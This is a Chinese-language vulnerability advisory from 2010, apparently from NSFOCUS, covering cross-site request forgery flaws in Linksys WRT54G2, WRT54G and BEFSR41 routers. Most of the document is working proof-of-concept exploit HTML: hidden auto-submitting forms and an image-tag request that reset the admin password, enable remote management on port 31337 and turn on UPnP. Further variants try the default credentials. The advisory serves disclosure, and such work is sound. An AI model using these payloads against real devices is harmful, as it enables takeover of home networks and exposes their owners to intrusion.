安全研究
安全漏洞
Linksys WRT54G2/BEFSR41跨站请求伪造漏洞
发布日期:2010-12-06
更新日期:2010-12-07
受影响系统:
Linksys BEF x.x描述:
Linksys WRT54G2 Wireless-G Broadband Router
Linksys WRT54G2是无线G宽带路由器,BEFSR41是家用有线路由器。
Linksys WRT54G2 / BEFSR41在实现上存在漏洞,攻击者可利用此漏洞发动跨站请求伪造攻击。
此漏洞源于1)缺少身份验证导致的Security.tri错误;2)设备允许用户通过HTTP请求更改路由器配置,而不对用户的请求执行任何有效性检查导致的Web界面错误。
<*来源:Martin Barbella
链接:http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0027.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
WRT54G2 PoC (tested with hardware version 1.5 and firmware version 1.50):
<html>
<head>
<title>WRT54G2 CSRF PoC</title>
</head>
<body onload="document.getElementById('F').submit()">
<form action="http://192.168.1.1/Manage.tri" method="post" id="F">
<input type="hidden" name="MANAGE_USE_HTTP" value="0" />
<input type="hidden" name="MANAGE_HTTP" value="1" />
<input type="hidden" name="MANAGE_HTTP_S" value="0" />
<input type="hidden" name="MANAGE_PASSWORDMOD" value="1" />
<input type="hidden" name="MANAGE_PASSWORD" value="__pwn3d__" />
<input type="hidden" name="MANAGE_PASSWORD_CONFIRM" value="__pwn3d__" />
<input type="hidden" name="_http_enable" value="1" />
<input type="hidden" name="MANAGE_WLFILTER" value="1" />
<input type="hidden" name="MANAGE_REMOTE" value="1" />
<input type="hidden" name="MANAGE_PORT" value="31337" />
<input type="hidden" name="MANAGE_UPNP" value="1" />
<input type="hidden" name="layout" value="en" />
</form>
</body>
</html>
The form's action can be changed in the following way to attempt to
log in with the default password:
<form action="http://a:admin192.168.1.1/Manage.tri" method="post" id="F">
As I mentioned before, success of this type of exploit depends on the
victim's browser. This is simply blocked in IE8, while Safari will
give a phishing warning, Firefox warns the user that they are
attempting to log in with the name "a", and Google Chrome simply
allows the request without notifying the user in any way.
WRT54G PoC (tested with hardware version 6 and firmware version 1.02.8):
<html>
<head>
<title>WRT54G CSRF PoC</title>
</head>
<body onload="document.getElementById('F').submit()">
<form action="http://192.168.1.1/manage.tri" method="post" id="F">
<input type="hidden" name="remote_mgt_https" value="0" />
<input type="hidden" name="http_enable" value="1" />
<input type="hidden" name="https_enable" value="0" />
<input type="hidden" name="PasswdModify" value="1" />
<input type="hidden" name="http_passwd" value="__pwn3d__" />
<input type="hidden" name="http_passwdConfirm" value="__pwn3d__" />
<input type="hidden" name="_http_enable" value="1" />
<input type="hidden" name="web_wl_filter" value="1" />
<input type="hidden" name="remote_management" value="1" />
<input type="hidden" name="http_wanport" value="31337" />
<input type="hidden" name="upnp_enable" value="1" />
<input type="hidden" name="layout" value="en" />
</form>
</body>
</html>
To attempt a login with the default password, the same type of
modification can be made, as shown here:
<form action="http://a:admin192.168.1.1/manage.tri" method="post" id="F">
BEFSR41 PoC (tested with hardware version 3 and firmware version 1.06.01):
<img src="http://192.168.1.1/Gozila.cgi?PasswdModify=1&sysPasswd=__pwn3d__&sysPasswdConfirm=__pwn3d__&Remote_Upgrade=1&Remote_Management=1&RemotePort=31337&UPnP_Work=0"
alt="Nothing to see here." />
And once again, a modification can be made to attempt to log in with
the default password, as shown here:
<img src="http://a:admin192.168.1.1/Gozila.cgi?PasswdModify=1&sysPasswd=__pwn3d__&sysPasswdConfirm=__pwn3d__&Remote_Upgrade=1&Remote_Management=1&RemotePort=31337&UPnP_Work=0"
alt="Nothing to see here." />
建议:
厂商补丁:
Linksys
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.linksys.com
浏览次数:2798
严重程度:0(网友投票)
绿盟科技给您安全的保障